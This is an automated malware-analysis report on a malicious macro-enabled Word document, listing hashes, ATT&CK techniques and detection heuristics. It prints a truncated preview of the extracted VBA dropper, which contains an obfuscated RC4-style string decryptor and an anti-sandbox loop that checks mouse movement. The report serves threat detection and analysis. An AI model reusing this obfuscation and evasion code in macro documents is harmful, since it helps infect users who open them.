Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 6dc0bd77e51eb9af…

MALICIOUS

Office (OOXML)

96.1 KB Created: 2016-02-14 17:17:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2016-03-27
MD5: e3d0f89ff5a826cafdcb37603ea277d5 SHA-1: 7bf2ffa8a3fcc5d1ea4a43029a0eb1a9b5f13cfa SHA-256: 6dc0bd77e51eb9af143c749539bd638020d557083479bcd4c4b9639fe61eb0f8
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is a malicious OOXML document containing a VBA project. The presence of a Document_Open macro and a Shell() call indicates that the document is designed to execute arbitrary code upon opening. The heuristic 'SE_ENABLE_LURE' suggests the document likely prompts the user to enable macros, a common social engineering tactic. The VBA code appears to be obfuscated, but the critical heuristic firings strongly suggest it's a downloader or dropper.

Heuristics 6

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 114968 bytes
SHA-256: c11eb2a2993511b8c3ac90b7aebcff2bcbb4857d17d239463da9aafb67177b73
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim MwGKiqklcpKBQN(3197) As Integer
Dim QAJfCyxmS7m(9000) As Long, Um6A4Q23aO(9999) As Long
Private Type QelScG3t
FXtIIJEmc As Integer
HDHgbZwgtCiSpIoS As Integer
End Type
#If VBA7 Then
Private Declare PtrSafe Sub GetCursorPos Lib "User32" (VorDe5Zwo0 As QelScG3t)
#Else
Private Declare Sub GetCursorPos Lib "User32" (VorDe5Zwo0 As QelScG3t)
#End If
Function JHfaUtmUSoeMf(AqqhAeSV3VI, JdFXCpVSYGjQEbueZ)
UfkIAAhJ0pI4K = 58 '63
JHfaUtmUSoeMf = AqqhAeSV3VI Xor JdFXCpVSYGjQEbueZ
PbcsZhe4NMd = 19 '71
End Function
Function WYui1L9(S4aoOZTs4() As Byte, XUexXVsefQB() As Byte) As String
On Error Resume Next
Dim B4MzngC(0 To 255) As Integer, LXZPzw As Long, Jl7IQL373u As Long, FJN As Long, SedZ5jikZelJ7n As Byte, RCBy8y8wrIl() As Byte, Ld70lb() As Byte
ReDim RCBy8y8wrIl(ETijRCiSJQF(S4aoOZTs4)) As Byte
RCBy8y8wrIl = S4aoOZTs4
ReDim Ld70lb(ETijRCiSJQF(XUexXVsefQB)) As Byte
Ld70lb = XUexXVsefQB
For LXZPzw = 0 To (2317 - 2062)
B4MzngC(LXZPzw) = LXZPzw
Next LXZPzw
LXZPzw = 0
Jl7IQL373u = 0
FJN = 0
For LXZPzw = 0 To (-7321 + 7576)
Jl7IQL373u = (Jl7IQL373u + B4MzngC(LXZPzw) + Ld70lb(LXZPzw Mod (ETijRCiSJQF(XUexXVsefQB) + 1))) Mod ((-1633 + 1889))
SedZ5jikZelJ7n = B4MzngC(LXZPzw)
B4MzngC(LXZPzw) = B4MzngC(Jl7IQL373u)
B4MzngC(Jl7IQL373u) = SedZ5jikZelJ7n
Next LXZPzw
LXZPzw = 0
Jl7IQL373u = 0
FJN = 0
For LXZPzw = 0 To ETijRCiSJQF(S4aoOZTs4)
Jl7IQL373u = (Jl7IQL373u + 1) Mod (1020160 / 3985)
FJN = (FJN + B4MzngC(Jl7IQL373u)) Mod (1249280 / 4880)
SedZ5jikZelJ7n = B4MzngC(Jl7IQL373u)
B4MzngC(Jl7IQL373u) = B4MzngC(FJN)
B4MzngC(FJN) = SedZ5jikZelJ7n
RCBy8y8wrIl(LXZPzw) = JHfaUtmUSoeMf(RCBy8y8wrIl(LXZPzw), (B4MzngC((B4MzngC(Jl7IQL373u) + B4MzngC(FJN)) Mod ((-3302 + 3558)))))
Next LXZPzw
WYui1L9 = V6RAi6IOw4pcJUp4o(RCBy8y8wrIl)
End Function
Sub Pq21G7K6SVUPuK()
VVezO9M21 = 10 '46
HUJ2FegX77yUAwtC = 41 '17
End Sub
Function KgGXuJ(ByVal Rfsudo9lSQ As Integer) As String
MrEWys33re = 44 '28
Dim N5543yfgVv(1) As Byte, TIYWzwhU7g  As Byte, Op7ekYMn  As Byte
DvUZi6e26vtJ27 = 19 '14
If Rfsudo9lSQ < 0 Then Exit Function
FvKs = 52 '61
If Rfsudo9lSQ > (5885 - 5630) Then
CRWMn2N8Bg7DBC = 65 '37
Op7ekYMn = 0
Else
UARhm2kNa = 74 '22
TIYWzwhU7g = Rfsudo9lSQ
TUvRtGpJpEC = 9 '91
Op7ekYMn = 0
O3qBNrDuzGB3H5UE = 28 '22
End If
MnA4TNbeicXAa = 11 '24
N5543yfgVv(0) = TIYWzwhU7g
N3lraHhOGS0r = 31 '26
N5543yfgVv(1) = Op7ekYMn
HA2xLuUdW2 = 43 '33
KgGXuJ = N5543yfgVv
DjtPkFg = 64 '9
End Function
Function ETijRCiSJQF(ByVal WWs1ARAI9VCIB299m As Variant) As Long
PUGaY4k = 74 '1
On Error GoTo DB8limVUGA5
FSi6R4NsFx1D = 75 '63
Dim DDeKUGTkqhx5 As Long, GPTdbzmn4si As Variant
UyWJIDxddyO9lQR5 = 59 '97
Do
GPTdbzmn4si = WWs1ARAI9VCIB299m(DDeKUGTkqhx5)
DDeKUGTkqhx5 = DDeKUGTkqhx5 + 1
Loop
OofGoNY65U = 9 '97
DB8limVUGA5:
EUx6qT3CW = 8 '93
If DDeKUGTkqhx5 = 0 Then Exit Function
G2MnB1gVL = 58 '28
ETijRCiSJQF = DDeKUGTkqhx5 - 1
HnF8UKj02e7 = 7 '2
End Function
Sub H7wPqyWQN()
O9NlNLMwl7FBfl = 7 '15
Dim GhyDI As QelScG3t, Bn4S0xAYm As Integer, LnkshwqFQVD As Long, BvnhC2j0ig As Long, KdLszP1yqbv As Integer, L7J3GewxaOt As Integer
EpzYSYvg = 39 '29
KdLszP1yqbv = (9300 - 9298)
LN6CheeYJ = 16 '46
GetCursorPos GhyDI
XfCddiEq = 28 '7
Bn4S0xAYm = GhyDI.FXtIIJEmc + GhyDI.HDHgbZwgtCiSpIoS
Gi6GZeBHtYQ = 98 '59
If Bn4S0xAYm < (22830 / 2283) Then
T7Hwl = 68 '35
Do
Loop Until 1 = 0
OTIkml1GSL = 92 '72
End If
TgmFUyBb6nko5C = 23 '77
L7J3GewxaOt = 0
K19a2rUKoA = 34 '80
Do
BvnhC2j0ig = Timer + 1
Do While Timer < BvnhC2j0ig
Loop
GetCursorPos GhyDI
If GhyDI.FXtIIJEmc + GhyDI.HDHgbZwgtCiSpIoS <> Bn4S0xAYm Then
L7J3GewxaOt = L7J3GewxaOt + 1
If L7J3GewxaOt >= KdLszP1yqbv Then Exit Do
Bn4S0xAYm = GhyDI.FXtIIJEmc + GhyDI.HDHgbZwgtCiSpIoS
End If
LnkshwqFQVD = LnkshwqFQVD + 1
Loop Until LnkshwqFQVD = (-2657 + 2
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 165888 bytes
SHA-256: 3fd0252d612dd9ad32334807e8d629820afed7cbbf7259b1dc8a4ed56710d8d7

Open this report in the interactive analyzer, or submit your own file for analysis.